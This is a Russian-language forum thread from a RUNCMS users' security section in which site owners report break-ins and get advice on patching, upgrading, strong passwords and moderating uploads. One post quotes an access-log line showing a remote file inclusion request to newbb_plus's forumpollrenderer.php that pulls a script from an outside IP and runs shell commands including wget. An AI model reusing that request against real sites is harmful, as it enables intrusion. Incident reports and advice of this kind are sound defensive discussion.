Сайт сообщества | Клуб пользователей | О проекте

Имя
Пароль
ПравилаРегистрацияСправка
Сообщения за деньПоиск

Вернуться   Клуб пользователей портальной системы RUNCMS > Портал > Безопасность

Ответ
 
Опции темы Опции просмотра
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #91 11-27-2005, 22:35

Цитата:
Сообщение от dervish
Я тоже пострадал короче.
Давайте все таки сообщать - характер взлома, версия портала, список установленных модулей. Так быстрее устанавливать причину.


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
dervish вне форума dervish
Нерешительный


| Цитировать Старый #92 11-27-2005, 23:25

Привет!

Зашли через форум (newbb_plus 0.81), портал на 1.1 версии стоит. До 1.2 версии не апгрейдил.

А вот что было в логах:

Цитата:
******.net:202.162.196.1 - - [06/Nov/2005:01:13:18 -0500] "GET /modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://216.111.31.2/cse.gif?&cmd=cd%20/usr/src/smartmontools-5.27;ls%20-alF;/sbin/ifconfig|grep%20inet;wget HTTP/1.0" 200 5941
"-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"

  Сообщения: 6 c 05.10.2004 | Репутация: 1
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #93 11-27-2005, 23:41

Цитата:
Сообщение от dervish
Зашли через форум (newbb_plus 0.81), портал на 1.1 версии стоит. До 1.2 версии не апгрейдил.
Цитата:
Сообщение от dervish
Я патчил только форум.
Ну так заплатка стояла или нет? Эта дырка закрыта в патче


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
dervish вне форума dervish
Нерешительный


| Цитировать Старый #94 11-28-2005, 00:03

Нет, LARK, сейчас только доступ дал хостер к моему сайту. Я сразу же закрыл дырку. Но вопрос, а еше есть где-то другие файлы нужно менять? например здесь выше об аватарах речь идет, а где именно какой файл менят не написали.

  Сообщения: 6 c 05.10.2004 | Репутация: 1
LARK вне форума LARK
[исход]

Аватар для LARK

| Цитировать Старый #95 11-28-2005, 19:15

Цитата:
Сообщение от dervish
Но вопрос, а еше есть где-то другие файлы нужно менять? например здесь выше об аватарах речь идет, а где именно какой файл менят не написали.
Лучше до 1.2 обновить, там несколько дырок закрыто, и более менее нормальный фильтр от SQL инъекций стоит. Насчет аватаров, пока вообще не ясно - есть новая дырка или нет.


Правила нашего Форума :: О клубе пользователей RUNCMS :: Рекомендации по публикации сообщений :: Прежде чем задать вопрос воспользуйтесь Поиском
-------------------------------------------------------------------
Если что-то не работает, задавая вопрос, ! ОБЯЗАТЕЛЬНО ! пишите версию RUNCMS/модуля/PHP/MySQL и текст самой ошибки.
Посетить домашнюю страницу LARK
  Сообщения: 4,185 c 20.09.2003 | Репутация: 223
TomBRaider вне форума TomBRaider
Младший участник

Аватар для TomBRaider

| Цитировать Старый #96 12-23-2005, 14:17

взломали и мой сайт. насовали шеллов. версия портала 1.1а с кучей исправлений и паков. но дело не в том. вскрыли не через форум или конкретый модуль а через авторизацию портала. просмотр access_log дал возможность оперативно вынуть файлы. после того как я нашел хакера))) (в принципе наследил он много и особо не скрывался) выяснил что взлом был осуществлен через подбор пароля админа сайта. Шелл был залит через модуль mydownloads, у меня модифицированный стоит, но оказывается там можно в скриншоты добавить *.php
жду ответа наших гуру.
к сожалению взлом пароля и конкретный заход на сайт различаются по времени поэтому логов самого взлома у меня нет.
такая дырка в портальной системе практически ставит крест на коммерческом использовании этой cms, во всяком случае для меня.

Последний раз редактировалось TomBRaider, 12-23-2005 в 14:36

  Сообщения: 45 c 28.01.2005 | Репутация: 1
LaRok вне форума LaRok
攻殻機動隊


| Цитировать Старый #97 12-23-2005, 16:34

TomBRaider Значит не стоило выставлять простые пароли на админские входы. Используйте сложные пароли, ставте files, вводите запрет на группы для добавления скриншотов.

Цитата:
Сообщение от TomBRaider
такая дырка в портальной системе практически ставит крест на коммерческом использовании этой cms, во всяком случае для меня.
Если говорить о бруте и человеческом факторе(простые пароли), то такая уязвимость есть в любой системе.

Посетить домашнюю страницу LaRok
  Сообщения: 2,045 c 13.09.2003 | Репутация: 25
TomBRaider вне форума TomBRaider
Младший участник

Аватар для TomBRaider

| Цитировать Старый #98 12-23-2005, 17:09

Цитата:
Сообщение от LaRok
ставте files, вводите запрет на группы для добавления скриншотов.
кстати об этом модуле. есть ли скрипт который бы перенес базу с mydownloads в files? а то у меня более 1000 файлов <<Всего файлов: 1238, Всего категорий: 28 Всего загрузок: 61109>>. и насколько он безопаснее чем модифицированный mydownloads? точнее есть ли разница принципиальная между ними в плане безопасности?

Последний раз редактировалось TomBRaider, 12-23-2005 в 17:26

  Сообщения: 45 c 28.01.2005 | Репутация: 1
Zormax вне форума Zormax
Старожил

Аватар для Zormax

| Цитировать Старый #99 12-24-2005, 07:50

Цитата:
Сообщение от TomBRaider
есть ли разница принципиальная между ними в плане безопасности?
Нет.
Пароль желательно символом на 10, не меньше...
Цитата:
Сообщение от TomBRaider
Шелл был залит через модуль mydownloads, у меня модифицированный стоит, но оказывается там можно в скриншоты добавить *.php
Значит не все патчи стояли.
В свое время была заплатка от этого. Прикрепляю файл, для версии 1.1А
Замени:
class\fileupload.php

Посмотри в прикрепленном файле строки 601-607, у тебя такое было?

Ну и напоследок, не стоит доверять посетителям и разрешать отправлять статьи, новости, файлы без модерации администратором или модератором, народу на свете много всякого хватает...
Вложения
Тип файла: zip fileupload.zip (6.9 Кбайт, 4 просмотров)


Всё для Sony Ericsson
Посетить домашнюю страницу Zormax
  Сообщения: 2,424 c 15.05.2004 | Репутация: 149
pan вне форума pan
): ǝҺɐни dиw ɐн иd⊥оwɔ

Аватар для pan

| Цитировать Старый #100 12-24-2005, 10:37

Цитата:
такая дырка в портальной системе практически ставит крест на коммерческом использовании этой cms
ну если оставлять пароль типа 12345 то да
А так я поддерживаю Zormax модерировать нужно все, ведь это твой сайт


Напильник для RUNCMS
Строим помаленьку
Для гурманов
Мебель для дома
Посетить домашнюю страницу pan
  Сообщения: 4,777 c 15.03.2004 | Репутация: 121
Ответ


Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.
Быстрый переход


Рейтинг@Mail.ru Хостинг провайдер Majordomo. Powered by: vBulletin Version 3.0
Copyright ©2000-2024, Jelsoft Enterprises Ltd.
Все разделы прочитаны - Руководство форума - Архив - Вверх
Rambler's Top100
Output: 90.85 Kb. compressed to 83.11 Kb. by saving 7.73 Kb. (8.51%)
Page generated in 0.08444 seconds with 11 queries